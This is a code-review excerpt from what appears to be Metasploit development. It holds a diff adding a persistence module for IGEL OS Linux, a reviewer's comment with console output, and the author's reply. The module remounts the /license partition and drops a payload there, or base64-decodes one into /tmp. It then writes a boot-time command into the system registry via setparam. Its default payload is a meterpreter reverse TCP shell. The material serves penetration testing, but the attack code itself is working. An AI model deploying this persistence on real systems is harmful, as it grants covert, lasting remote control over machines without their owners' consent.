modules/exploits/linux/persistence/igel_persistence.rb

```diff
@@ -0,0 +1,115 @@
+        },
+        'Author' => 'Zack Didcott',
+        'License' => MSF_LICENSE,
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Linux x86', {
+              'Arch' => ARCH_X86,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Linux x86_64', {
+              'Arch' => ARCH_X64,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'DisclosureDate' => '2024-05-16',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('REGISTRY_KEY', [
+        true,
+        'Registry key to use for automatically executing payload',
+        'userinterface.rccustom.custom_cmd_net_final'
+      ]),
+      OptString.new('TARGET_DIR', [true, 'Directory to write payload', '/license']),
+      OptBool.new('REGISTRY_ONLY', [true, 'Set whether to store payload in registry', false])
+    ])
+  end
+
+  def check
+    return CheckCode::Safe('Session does not have root access') unless is_root?
+
+    CheckCode::Appears('Session has root access')
+  end
+
+  def install_persistence
+    if datastore['REGISTRY_ONLY']
+      print_status('Base64-encoding payload')
+      encoded_payload = Rex::Text.encode_base64(generate_payload_exe)
+      command = base64_command(encoded_payload)
+    else
+      print_status("Uploading payload to #{datastore['TARGET_DIR']}")
+      payload_file = write_payload(generate_payload_exe, datastore['TARGET_DIR'], 0o700)
+      command = local_command(payload_file)
+    end
+    print_status('Writing persistence to registry')
+    write_registry(datastore['REGISTRY_KEY'], command)
+  end
+
+  def remount_license(opt = 'rw')
+    cmd_exec("/bin/mount -o remount,#{opt} /license")
+  end
+
+  def write_payload(contents, dir, perm)
+    remount_license('rw')
+
+    filepath = "#{dir}/#{Rex::Text.rand_text_alpha(8)}"
+    write_file(filepath, contents)
+    chmod(filepath, perm)
+
+    remount_license('ro')
+
+    return filepath
+  end
+
+  def base64_command(encoded_payload)
+    payload_dest = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
+    "/bin/bash -c '/bin/echo '#{encoded_payload}' | /usr/bin/base64 -d > '#{payload_dest}'; /bin/chmod +x '#{payload_dest}'; '#{payload_dest}' &'"
+  end
+
+  def local_command(payload_file)
+    command = "/bin/bash -c '/bin/mount -o remount,exec /license; '#{payload_file}' &'"
+    return command
+  end
+
+  def write_registry(key, value)
+    cmd_exec("/bin/setparam \"#{key}\" \"#{value}\"")
```

Comment:
Is there a way we can determine if this is successful? When you run the module, it just kind of stops, even when it works.  It might be useful to just say "Registry added, you should get a session when the target reboots" or something to let the user know it is done.

```
msf exploit(linux/persistence/igel_persistence) > run
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.
msf exploit(linux/persistence/igel_persistence) > 
[*] Started reverse TCP handler on 10.5.135.201:4545 
[*] Uploading payload to /license
[*] Writing persistence to registry

msf exploit(linux/persistence/igel_persistence) >
```

Reply:
I've added a method to get values from registry and the module now confirms that the command is written successfully.
Completed via c0a756a751d071e9f0d5712bbff035762228a9d9.